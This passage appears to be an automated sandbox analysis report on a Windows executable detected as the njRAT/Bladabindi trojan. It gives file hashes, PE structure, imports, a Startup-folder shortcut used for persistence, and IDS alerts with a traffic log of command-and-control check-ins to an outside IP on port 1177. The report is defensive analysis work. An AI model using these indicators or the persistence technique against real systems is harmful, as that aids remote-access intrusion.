SHA-512: | F3CA77CEBD03A66D83BB12C9CA53DE14756F39E2EA76598413DCDE5AA70712005876469DDD297C48C47E17C259FE8640D53F350688F13D072517E405859889B1 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RF44a554.TMP (copy)
Download File
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 6045 |
Entropy (8bit): | 3.5897762024878896 |
Encrypted: | false |
SSDEEP: | 96:HbhQCwO4IyqvsqvJCwo1etn5/bHWdkn5/bHydf:HbWCo1et9Kdk9udf |
MD5: | 9441DDC3CCCBF7C0B5A921C96BB2FB49 |
SHA1: | A77B0A1A047995EE2C62828AD9F03BB64B3C1CC9 |
SHA-256: | 487D5CD7B88EA3B2DEFE1E836ADD74DA3DBD8C2D8235E27EACA38C621A8FCD45 |
SHA-512: | F3CA77CEBD03A66D83BB12C9CA53DE14756F39E2EA76598413DCDE5AA70712005876469DDD297C48C47E17C259FE8640D53F350688F13D072517E405859889B1 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\PKVJK6R4786INHH74LL9.temp
Download File
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 6045 |
Entropy (8bit): | 3.5897762024878896 |
Encrypted: | false |
SSDEEP: | 96:HbhQCwO4IyqvsqvJCwo1etn5/bHWdkn5/bHydf:HbWCo1et9Kdk9udf |
MD5: | 9441DDC3CCCBF7C0B5A921C96BB2FB49 |
SHA1: | A77B0A1A047995EE2C62828AD9F03BB64B3C1CC9 |
SHA-256: | 487D5CD7B88EA3B2DEFE1E836ADD74DA3DBD8C2D8235E27EACA38C621A8FCD45 |
SHA-512: | F3CA77CEBD03A66D83BB12C9CA53DE14756F39E2EA76598413DCDE5AA70712005876469DDD297C48C47E17C259FE8640D53F350688F13D072517E405859889B1 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\TT2NP7KQGD8NJDGHFW0B.temp
Download File
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 6045 |
Entropy (8bit): | 3.5897762024878896 |
Encrypted: | false |
SSDEEP: | 96:HbhQCwO4IyqvsqvJCwo1etn5/bHWdkn5/bHydf:HbWCo1et9Kdk9udf |
MD5: | 9441DDC3CCCBF7C0B5A921C96BB2FB49 |
SHA1: | A77B0A1A047995EE2C62828AD9F03BB64B3C1CC9 |
SHA-256: | 487D5CD7B88EA3B2DEFE1E836ADD74DA3DBD8C2D8235E27EACA38C621A8FCD45 |
SHA-512: | F3CA77CEBD03A66D83BB12C9CA53DE14756F39E2EA76598413DCDE5AA70712005876469DDD297C48C47E17C259FE8640D53F350688F13D072517E405859889B1 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft.lnk
Download File
Process: | C:\Users\user\Desktop\._cache_1.exe |
File Type: | |
Category: | modified |
Size (bytes): | 989 |
Entropy (8bit): | 4.740025030042471 |
Encrypted: | false |
SSDEEP: | 12:8m6stk1g4cB8Cr4016WbWsMR+/GkT04IipuRS1l1Q1SwuG3YilMMEpxRljK6Tdza:8mNt8W8EKsMR5SpuUvqkw3qfk7N |
MD5: | AA4F9419DC20439A76EE7C5970F52BAD |
SHA1: | E7DE470815B816CAEEA8032096F6CD0BF07587AE |
SHA-256: | DBE92079821CC3FC3471F6C641617320FDD9BE5078E258C60CCB576BAE2AAB42 |
SHA-512: | A65C967C0E6E7AD920C4C139459ADB712B6ABCBE971F2D34403761E5F46F7653E440D3A342C847DD69032F9D060FD08EBA9BD7FA68087E2733F04F8F4C0C4A41 |
Malicious: | false |
Preview: |
File type: | |
Entropy (8bit): | 7.456452138313528 |
TrID: |
|
File name: | ._cache_1.exe |
File size: | 1'178'304 bytes |
MD5: | 62c01f1b2ac0a7bab6c3b50fd51e6a36 |
SHA1: | cfc301a04b9a4ffeb0dc4578c1998a4eb4754f7b |
SHA256: | c46a631f0bc82d8c2d46e9d8634cc50242987fa7749cac097439298d1d0c1d6e |
SHA512: | 6617b2723526a8f569d796352e21fb902d1db76dd3a3c6b6562915a7fb087b7e65871921fcdc97871b302d77efa0b60d63872bb0b8bae4a7d982486428cd43ab |
SSDEEP: | 24576:HRmJkcoQricOIQxiZY1iagI+bpJBIAkPcJCqbVvi1N:sJZoQrbTFZY1iagTpVkybVqT |
TLSH: | 4E45E122F9C68036C2B327B19E7EF76A963D69370327D19727C82D315EA05416B39723 |
File Content Preview: | MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........................1b.......P.).....Q.......y.......i..........}....N.......d.......`.......m.......g.....Rich............PE..L.. |
Icon Hash: | 69b45d29924d0b06 |
Entrypoint: | 0x4165c1 |
Entrypoint Section: | .text |
Digitally signed: | false |
Imagebase: | 0x400000 |
Subsystem: | windows gui |
Image File Characteristics: | RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE |
DLL Characteristics: | TERMINAL_SERVER_AWARE |
Time Stamp: | 0x4F25BAEC [Sun Jan 29 21:32:28 2012 UTC] |
TLS Callbacks: | |
CLR (.Net) Version: | |
OS Version Major: | 5 |
OS Version Minor: | 0 |
File Version Major: | 5 |
File Version Minor: | 0 |
Subsystem Version Major: | 5 |
Subsystem Version Minor: | 0 |
Import Hash: | d3bf8a7746a8d1ee8f6e5960c3f69378 |
Instruction |
---|
call 00007FE8BC7CAF6Bh |
jmp 00007FE8BC7C1DDEh |
int3 |
int3 |
int3 |
int3 |
int3 |
push ebp |
mov ebp, esp |
push edi |
push esi |
mov esi, dword ptr [ebp+0Ch] |
mov ecx, dword ptr [ebp+10h] |
mov edi, dword ptr [ebp+08h] |
mov eax, ecx |
mov edx, ecx |
add eax, esi |
cmp edi, esi |
jbe 00007FE8BC7C1F5Ah |
cmp edi, eax |
jc 00007FE8BC7C20F6h |
cmp ecx, 00000080h |
jc 00007FE8BC7C1F6Eh |
cmp dword ptr [004A9724h], 00000000h |
je 00007FE8BC7C1F65h |
push edi |
push esi |
and edi, 0Fh |
and esi, 0Fh |
cmp edi, esi |
pop esi |
pop edi |
jne 00007FE8BC7C1F57h |
jmp 00007FE8BC7C2332h |
test edi, 00000003h |
jne 00007FE8BC7C1F66h |
shr ecx, 02h |
and edx, 03h |
cmp ecx, 08h |
jc 00007FE8BC7C1F7Bh |
rep movsd |
jmp dword ptr [00416740h+edx*4] |
mov eax, edi |
mov edx, 00000003h |
sub ecx, 04h |
jc 00007FE8BC7C1F5Eh |
and eax, 03h |
add ecx, eax |
jmp dword ptr [00416654h+eax*4] |
jmp dword ptr [00416750h+ecx*4] |
nop |
jmp dword ptr [004166D4h+ecx*4] |
nop |
inc cx |
add byte ptr [eax-4BFFBE9Ah], dl |
inc cx |
add byte ptr [ebx], ah |
ror dword ptr [edx-75F877FAh], 1 |
inc esi |
add dword ptr [eax+468A0147h], ecx |
add al, cl |
jmp 00007FE8BEC3A757h |
add esi, 03h |
add edi, 03h |
cmp ecx, 08h |
jc 00007FE8BC7C1F1Eh |
rep movsd |
jmp dword ptr [00000000h+edx*4] |
Programming Language: |
|
Name | Virtual Address | Virtual Size | Is in Section |
---|---|---|---|
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x8d41c | 0x154 | .rdata |
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xab000 | 0x34b8 | .rsrc |
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_IAT | 0x82000 | 0x844 | .rdata |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
---|---|---|---|---|---|---|---|---|---|
.text | 0x1000 | 0x8061c | 0x80800 | 61ffce4768976fa0dd2a8f6a97b1417a | False | 0.5583182605787937 | data | 6.684690148171278 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ |
.rdata | 0x82000 | 0xdfc0 | 0xe000 | 0354bc5f2376b5e9a4a3ba38b682dff1 | False | 0.36085728236607145 | data | 4.799741132252136 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
.data | 0x90000 | 0x1a758 | 0x6800 | 8033f5a38941b4685bc2299e78f31221 | False | 0.15324519230769232 | data | 2.1500715391677487 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
.rsrc | 0xab000 | 0x34b8 | 0x3600 | 2e5ce065e7be297f382500898f0288da | False | 0.24811921296296297 | data | 3.387310935125315 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
Name | RVA | Size | Type | Language | Country | ZLIB Complexity |
---|---|---|---|---|---|---|
RT_ICON | 0xab448 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors | English | Great Britain | 0.3277027027027027 |
RT_ICON | 0xab570 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.7466216216216216 |
RT_ICON | 0xab698 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.3885135135135135 |
RT_ICON | 0xab7c0 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 320 | English | Great Britain | 0.10549132947976879 |
RT_MENU | 0xabd28 | 0x50 | data | English | Great Britain | 0.9 |
RT_DIALOG | 0xabd78 | 0xfc | data | English | Great Britain | 0.6507936507936508 |
RT_STRING | 0xabe78 | 0x530 | data | English | Great Britain | 0.33960843373493976 |
RT_STRING | 0xac3a8 | 0x690 | data | English | Great Britain | 0.26964285714285713 |
RT_STRING | 0xaca38 | 0x4d0 | data | English | Great Britain | 0.36363636363636365 |
RT_STRING | 0xacf08 | 0x5fc | data | English | Great Britain | 0.3087467362924282 |
RT_STRING | 0xad508 | 0x65c | data | English | Great Britain | 0.34336609336609336 |
RT_STRING | 0xadb68 | 0x388 | data | English | Great Britain | 0.377212389380531 |
RT_STRING | 0xadef0 | 0x158 | Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0 | English | United States | 0.502906976744186 |
RT_GROUP_ICON | 0xae048 | 0x14 | data | English | Great Britain | 1.15 |
RT_GROUP_ICON | 0xae060 | 0x14 | data | English | Great Britain | 1.15 |
RT_GROUP_ICON | 0xae078 | 0x14 | data | English | Great Britain | 1.25 |
RT_GROUP_ICON | 0xae090 | 0x14 | data | English | Great Britain | 1.25 |
RT_VERSION | 0xae0a8 | 0x19c | data | English | Great Britain | 0.5339805825242718 |
RT_MANIFEST | 0xae248 | 0x26c | ASCII text, with CRLF line terminators | English | United States | 0.5145161290322581 |
DLL | Import |
---|---|
WSOCK32.dll | __WSAFDIsSet, setsockopt, ntohs, recvfrom, sendto, htons, select, listen, WSAStartup, bind, closesocket, connect, socket, send, WSACleanup, ioctlsocket, accept, WSAGetLastError, inet_addr, gethostbyname, gethostname, recv |
VERSION.dll | VerQueryValueW, GetFileVersionInfoW, GetFileVersionInfoSizeW |
WINMM.dll | timeGetTime, waveOutSetVolume, mciSendStringW |
COMCTL32.dll | ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_ReplaceIcon, ImageList_Create, InitCommonControlsEx, ImageList_Destroy |
MPR.dll | WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W, WNetUseConnectionW |
WININET.dll | InternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetConnectW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetQueryOptionW, InternetQueryDataAvailable |
PSAPI.DLL | EnumProcesses, GetModuleBaseNameW, GetProcessMemoryInfo, EnumProcessModules |
USERENV.dll | CreateEnvironmentBlock, DestroyEnvironmentBlock, UnloadUserProfile, LoadUserProfileW |
KERNEL32.dll | HeapAlloc, Sleep, GetCurrentThreadId, RaiseException, MulDiv, GetVersionExW, GetSystemInfo, InterlockedIncrement, InterlockedDecrement, WideCharToMultiByte, lstrcpyW, MultiByteToWideChar, lstrlenW, lstrcmpiW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, DeleteFileW, FindNextFileW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, GetProcessHeap, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetLocalTime, CompareStringW, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionAndSpinCount, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, GetTempPathW, GetTempFileNameW, VirtualFree, FormatMessageW, GetExitCodeProcess, SetErrorMode, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, DeviceIoControl, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetCurrentThread, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, LoadLibraryExW, HeapFree, WaitForSingleObject, CreateThread, DuplicateHandle, GetLastError, CloseHandle, GetCurrentProcess, GetProcAddress, LoadLibraryA, FreeLibrary, GetModuleFileNameW, GetFullPathNameW, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, ExitProcess, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetTimeFormatW, GetDateFormatW, GetCommandLineW, GetStartupInfoW, IsProcessorFeaturePresent, HeapSize, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStringTypeW, HeapCreate, SetHandleCount, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, LCMapStringW, RtlUnwind, SetFilePointer, GetTimeZoneInformation, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetTickCount, HeapReAlloc, WriteConsoleW, SetEndOfFile, SetSystemPowerState, SetEnvironmentVariableA |
USER32.dll | GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, ReleaseCapture, SetCapture, WindowFromPoint, LoadImageW, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, CheckMenuRadioItem, SetWindowPos, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, TranslateMessage, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, GetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, MessageBoxW, DefWindowProcW, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, GetMenuItemID, DispatchMessageW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, PeekMessageW, UnregisterHotKey, CharLowerBuffW, keybd_event, MonitorFromRect, GetWindowThreadProcessId |
GDI32.dll | DeleteObject, AngleArc, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, GetDeviceCaps, MoveToEx, DeleteDC, GetPixel, CreateDCW, Ellipse, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, LineTo |
COMDLG32.dll | GetSaveFileNameW, GetOpenFileNameW |
ADVAPI32.dll | RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegConnectRegistryW, CloseServiceHandle, UnlockServiceDatabase, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, InitializeSecurityDescriptor, InitializeAcl, GetLengthSid, CopySid, LogonUserW, LockServiceDatabase, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, GetAce, AddAce, SetSecurityDescriptorDacl, RegOpenKeyExW, RegQueryValueExW, AdjustTokenPrivileges, InitiateSystemShutdownExW, OpenSCManagerW, RegCloseKey |
SHELL32.dll | DragQueryPoint, ShellExecuteExW, SHGetFolderPathW, DragQueryFileW, SHEmptyRecycleBinW, SHBrowseForFolderW, SHFileOperationW, SHGetPathFromIDListW, SHGetDesktopFolder, SHGetMalloc, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish |
ole32.dll | OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CLSIDFromString, StringFromGUID2, CoInitialize, CoUninitialize, CoCreateInstance, CreateStreamOnHGlobal, CoTaskMemAlloc, CoTaskMemFree, ProgIDFromCLSID, OleInitialize, CreateBindCtx, CLSIDFromProgID, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket, OleUninitialize, IIDFromString |
OLEAUT32.dll | VariantChangeType, VariantCopyInd, DispCallFunc, CreateStdDispatch, CreateDispTypeInfo, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SysStringLen, SafeArrayAllocData, GetActiveObject, QueryPathOfRegTypeLib, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysAllocString, VariantCopy, VariantClear, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, OleLoadPicture, SafeArrayAccessData, VariantInit |
Language of compilation system | Country where language is spoken | Map |
---|---|---|
English | Great Britain | |
English | United States |
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|---|---|---|
07/01/24-10:22:43.879655 | TCP | 2017419 | ET TROJAN Bladabindi/njrat CnC Checkin | 49166 | 1177 | 192.168.2.22 | 192.169.69.25 |
07/01/24-10:25:00.126873 | TCP | 2017419 | ET TROJAN Bladabindi/njrat CnC Checkin | 49176 | 1177 | 192.168.2.22 | 192.169.69.25 |
07/01/24-10:24:33.177434 | TCP | 2017419 | ET TROJAN Bladabindi/njrat CnC Checkin | 49174 | 1177 | 192.168.2.22 | 192.169.69.25 |
07/01/24-10:25:27.489939 | TCP | 2017419 | ET TROJAN Bladabindi/njrat CnC Checkin | 49178 | 1177 | 192.168.2.22 | 192.169.69.25 |
07/01/24-10:23:24.901144 | TCP | 2017419 | ET TROJAN Bladabindi/njrat CnC Checkin | 49169 | 1177 | 192.168.2.22 | 192.169.69.25 |
07/01/24-10:24:19.571508 | TCP | 2017419 | ET TROJAN Bladabindi/njrat CnC Checkin | 49173 | 1177 | 192.168.2.22 | 192.169.69.25 |
07/01/24-10:22:30.431063 | TCP | 2017419 | ET TROJAN Bladabindi/njrat CnC Checkin | 49165 | 1177 | 192.168.2.22 | 192.169.69.25 |
07/01/24-10:23:52.503013 | TCP | 2017419 | ET TROJAN Bladabindi/njrat CnC Checkin | 49171 | 1177 | 192.168.2.22 | 192.169.69.25 |
07/01/24-10:22:03.684189 | TCP | 2017419 | ET TROJAN Bladabindi/njrat CnC Checkin | 49163 | 1177 | 192.168.2.22 | 192.169.69.25 |
07/01/24-10:23:38.664413 | TCP | 2017419 | ET TROJAN Bladabindi/njrat CnC Checkin | 49170 | 1177 | 192.168.2.22 | 192.169.69.25 |
07/01/24-10:22:57.541620 | TCP | 2017419 | ET TROJAN Bladabindi/njrat CnC Checkin | 49167 | 1177 | 192.168.2.22 | 192.169.69.25 |
07/01/24-10:24:46.813104 | TCP | 2017419 | ET TROJAN Bladabindi/njrat CnC Checkin | 49175 | 1177 | 192.168.2.22 | 192.169.69.25 |
07/01/24-10:25:13.886977 | TCP | 2017419 | ET TROJAN Bladabindi/njrat CnC Checkin | 49177 | 1177 | 192.168.2.22 | 192.169.69.25 |
07/01/24-10:24:06.132111 | TCP | 2017419 | ET TROJAN Bladabindi/njrat CnC Checkin | 49172 | 1177 | 192.168.2.22 | 192.169.69.25 |
07/01/24-10:21:49.438511 | TCP | 2017419 | ET TROJAN Bladabindi/njrat CnC Checkin | 49162 | 1177 | 192.168.2.22 | 192.169.69.25 |
07/01/24-10:23:11.211027 | TCP | 2017419 | ET TROJAN Bladabindi/njrat CnC Checkin | 49168 | 1177 | 192.168.2.22 | 192.169.69.25 |
07/01/24-10:22:16.980393 | TCP | 2017419 | ET TROJAN Bladabindi/njrat CnC Checkin | 49164 | 1177 | 192.168.2.22 | 192.169.69.25 |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Jul 1, 2024 10:21:49.233390093 CEST | 49162 | 1177 | 192.168.2.22 | 192.169.69.25 |
Jul 1, 2024 10:21:49.238281965 CEST | 1177 | 49162 | 192.169.69.25 | 192.168.2.22 |
Jul 1, 2024 10:21:49.238344908 CEST | 49162 | 1177 | 192.168.2.22 | 192.169.69.25 |
Jul 1, 2024 10:21:49.438510895 CEST | 49162 | 1177 | 192.168.2.22 | 192.169.69.25 |
Jul 1, 2024 10:21:49.443491936 CEST | 1177 | 49162 | 192.169.69.25 | 192.168.2.22 |
Jul 1, 2024 10:21:58.999998093 CEST | 1177 | 49162 | 192.169.69.25 | 192.168.2.22 |
Jul 1, 2024 10:21:59.000073910 CEST | 49162 | 1177 | 192.168.2.22 | 192.169.69.25 |
Jul 1, 2024 10:22:02.155616045 CEST | 49162 | 1177 | 192.168.2.22 | 192.169.69.25 |
Jul 1, 2024 10:22:02.160375118 CEST | 1177 | 49162 | 192.169.69.25 | 192.168.2.22 |
Jul 1, 2024 10:22:03.676212072 CEST | 49163 | 1177 | 192.168.2.22 | 192.169.69.25 |
Jul 1, 2024 10:22:03.681183100 CEST | 1177 | 49163 | 192.169.69.25 | 192.168.2.22 |
Jul 1, 2024 10:22:03.681241035 CEST | 49163 | 1177 | 192.168.2.22 | 192.169.69.25 |
Jul 1, 2024 10:22:03.684189081 CEST | 49163 | 1177 | 192.168.2.22 | 192.169.69.25 |
Jul 1, 2024 10:22:03.691059113 CEST | 1177 | 49163 | 192.169.69.25 | 192.168.2.22 |
Jul 1, 2024 10:22:13.416788101 CEST | 1177 | 49163 | 192.169.69.25 | 192.168.2.22 |
Jul 1, 2024 10:22:13.416848898 CEST | 49163 | 1177 | 192.168.2.22 | 192.169.69.25 |
Jul 1, 2024 10:22:15.915493011 CEST | 49163 | 1177 | 192.168.2.22 | 192.169.69.25 |
Jul 1, 2024 10:22:15.920376062 CEST | 1177 | 49163 | 192.169.69.25 | 192.168.2.22 |
Jul 1, 2024 10:22:16.972631931 CEST | 49164 | 1177 | 192.168.2.22 | 192.169.69.25 |
Jul 1, 2024 10:22:16.977458000 CEST | 1177 | 49164 | 192.169.69.25 | 192.168.2.22 |
Jul 1, 2024 10:22:16.977514029 CEST | 49164 | 1177 | 192.168.2.22 | 192.169.69.25 |
Jul 1, 2024 10:22:16.980392933 CEST | 49164 | 1177 | 192.168.2.22 | 192.169.69.25 |
Jul 1, 2024 10:22:16.985172033 CEST | 1177 | 49164 | 192.169.69.25 | 192.168.2.22 |
Jul 1, 2024 10:22:26.670746088 CEST | 1177 | 49164 | 192.169.69.25 | 192.168.2.22 |
Jul 1, 2024 10:22:26.670850992 CEST | 49164 | 1177 | 192.168.2.22 | 192.169.69.25 |
Jul 1, 2024 10:22:29.175703049 CEST | 49164 | 1177 | 192.168.2.22 | 192.169.69.25 |
Jul 1, 2024 10:22:29.180486917 CEST | 1177 | 49164 | 192.169.69.25 | 192.168.2.22 |
Jul 1, 2024 10:22:30.423422098 CEST | 49165 | 1177 | 192.168.2.22 | 192.169.69.25 |
Jul 1, 2024 10:22:30.428383112 CEST | 1177 | 49165 | 192.169.69.25 | 192.168.2.22 |
Jul 1, 2024 10:22:30.428437948 CEST | 49165 | 1177 | 192.168.2.22 | 192.169.69.25 |
Jul 1, 2024 10:22:30.431062937 CEST | 49165 | 1177 | 192.168.2.22 | 192.169.69.25 |
Jul 1, 2024 10:22:30.436099052 CEST | 1177 | 49165 | 192.169.69.25 | 192.168.2.22 |
Jul 1, 2024 10:22:40.173226118 CEST | 1177 | 49165 | 192.169.69.25 | 192.168.2.22 |
Jul 1, 2024 10:22:40.173295021 CEST | 49165 | 1177 | 192.168.2.22 | 192.169.69.25 |
Jul 1, 2024 10:22:42.669631004 CEST | 49165 | 1177 | 192.168.2.22 | 192.169.69.25 |
Jul 1, 2024 10:22:42.674647093 CEST | 1177 | 49165 | 192.169.69.25 | 192.168.2.22 |
Jul 1, 2024 10:22:43.871829033 CEST | 49166 | 1177 | 192.168.2.22 | 192.169.69.25 |
Jul 1, 2024 10:22:43.876662016 CEST | 1177 | 49166 | 192.169.69.25 | 192.168.2.22 |
Jul 1, 2024 10:22:43.876718044 CEST | 49166 | 1177 | 192.168.2.22 | 192.169.69.25 |
Jul 1, 2024 10:22:43.879654884 CEST | 49166 | 1177 | 192.168.2.22 | 192.169.69.25 |
Jul 1, 2024 10:22:43.884468079 CEST | 1177 | 49166 | 192.169.69.25 | 192.168.2.22 |
Jul 1, 2024 10:22:53.692430019 CEST | 1177 | 49166 | 192.169.69.25 | 192.168.2.22 |
Jul 1, 2024 10:22:53.692595959 CEST | 49166 | 1177 | 192.168.2.22 | 192.169.69.25 |
Jul 1, 2024 10:22:56.210298061 CEST | 49166 | 1177 | 192.168.2.22 | 192.169.69.25 |
Jul 1, 2024 10:22:56.215200901 CEST | 1177 | 49166 | 192.169.69.25 | 192.168.2.22 |
Jul 1, 2024 10:22:57.533628941 CEST | 49167 | 1177 | 192.168.2.22 | 192.169.69.25 |
